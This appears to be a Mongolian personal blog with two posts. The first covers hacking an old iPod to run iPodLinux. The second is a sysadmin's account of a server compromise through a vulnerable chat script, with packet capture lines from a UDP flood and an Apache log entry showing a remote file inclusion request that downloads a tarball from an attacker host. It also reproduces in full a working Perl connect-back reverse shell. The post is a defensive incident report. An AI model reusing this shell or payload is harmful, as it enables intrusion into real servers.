Сүүлийн үед embedded system тэр дундаа embedded linux миний сонирхолыг ихээр татах болсон л доо. Солонгост сурдаг найз Тэгшбаяр маань энэ чиглэлээр нилээд туршлагажиж байгаа ба намайг бас "уруу татсан" нь энэ. ;) Бид хоёр хааяа мөрөөддөг л дөө. Жижигхэн хөөрхөн ч нилээд супер маягийн халаасны Монгол-Гадаад хэлний тольбичиг, ярианы дэвтэр бүхий электрон төхөөрөмж хийх талаар.. Дээр нь нэмээд медиа тоглуулагч, зургын цомог, фм радио хүлээн авагч энэ тэртэй гээд л... За тэгээд хийх юм, хэрэгцээ зөндөө зөндөө...
Тэгээд яг хийх гэхээр өнөөх л ядуу буурай орны зовлонд унана даа. Наад зах нь л Development Board, Flash ROM, Tester энэ тэрээс өгсүүлээд л тоног төхөөрөмж байхгүй. Бүгдийг гаднаас авна гэвэл нилээд хөөрхөн төсөв гарчих жишээтэй. Байхгүйнээ :(
Гэхдээ хүний сонирхол татагдаад, тэмүүлээд ирвэл ямар нэгэн байдлаар хийж үзэж байж л санаа амарна. (Дээр үед "шилэн форд" чаачаантай адил машинийг нэг монгол дархан дан модоор хийчихсэн гэсэн яриа ч байдаг шүү)
"Чанга гар" (hackers/crackers)-ууд маань аль хэдийнэ л нөгөө үйлдвэрлэгдэж гарсан хэдэн төхөөрөмж, бүтээгдэхүүнийг өөрийн хүссэнээр өөрчилөх, нэмэх, сайжруулах зүйлийг гаргачихдаг хойно, Apple iPod mp3 тоглуулагч төхөөрөмж дээр µCLinux port-лж орхижээ.
Хэрвээ таньд хуучин ч юмуу iPod байдаг ба linux систем ашиглах дуртай, тэгээд дээр нь өөрийн гэсэн mp3 тоглуулагч хиймээр байвал iPodLinux татаж аваад хакдаад үз.
Ер нь инженер сэтгэлгээтэй хүмүүс аль хүүхэд байхаасаа л тоглоомоо задлаад үзчихдэг, яаж ажилладгыг ухдаг сониуч зантай байдаг. Энэ бол тийм л зангийн хэлтэрхий гэмээр юмуу даа. За ингээд би ч бас нэг хуучин iPod-ыг customized own mp3/media player, game box болголоо.
Happy Hacking iPod!
Саяхан нэг өдөр хостинг компаниас имэйл ирэв. Унштал танай серверээс хөрш сервер руу flood аттак хийсэн байна. Уг аттак хийсэн хэрэглэгчийг устгах буюу шаардлагатай арга хэмжээг яаралтай авна уу гэж байна.
2006-09-23 18:57:55.622633 MYHOST -> TARGETHOST IP Fragmented IP protocol (proto=UDP 0x11, off=50320)
2 2006-09-23 18:57:55.622637 MYHOST -> TARGETHOST IP Fragmented IP protocol (proto=UDP 0x11, off=51800)
4 2006-09-23 18:57:55.622641 MYHOST -> TARGETHOST IP Fragmented IP protocol (proto=UDP 0x11, off=53280)
6 2006-09-23 18:57:55.622741 MYHOST -> TARGETHOST IP Fragmented IP protocol (proto=UDP 0x11, off=54760)
.....
91.73 inbound Mbps to TARGETHOST
0.00 outbound Mbps from TARGETHOST
Серверт ороод системийн бүртгэлүүдийг (system logs) бүгдийг нь ухлаа даа. /tmp фолдероос хэдэн файл ачаалсан нь харагдав.
Apache хэрэглэгчээр /tmp дотор хэдэн скрипт файлыг upload хийчихжээ.
ls -a /tmp
.x dc.txt i.pl t.pl t.pl.1 w00t xxd.txt
Apache-ын бүртгэл дотор
/var/log/httpd/httpd-access_log.3:202.182.48.94 - - [14/Sep/2006:00:51:47 -0500] " GET /chatters/aedatingCMS2.php?dir[inc]=http://HACKERHOST/thekuntul/aa.txt?& cmd=uname%20-a; id; cd%20/var/www/html/chatters/patServer; wget%20HACKERHOST/supernova/psy.tar.gz HTTP/1.0" 200 3316
гэсэн мөр олдов. Манай нэг кодер open source chat script туршиж байгаад орхисон байсан нь upload хийгддэг алдаатай код байж л дээ.
cat dc.txt
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
Ай шибаал гэж, ингээд л нэг гарыг серверт apache хэрэглэгчээр shell команд горим ачаалуулчихсан байваа.
Хамгийн их довтолгоонд өртдөг нь веб сервер учраас түүнийхээ хамгаалалтыг байнга чангатгаад байж дээ. Сис админ-уудаа!
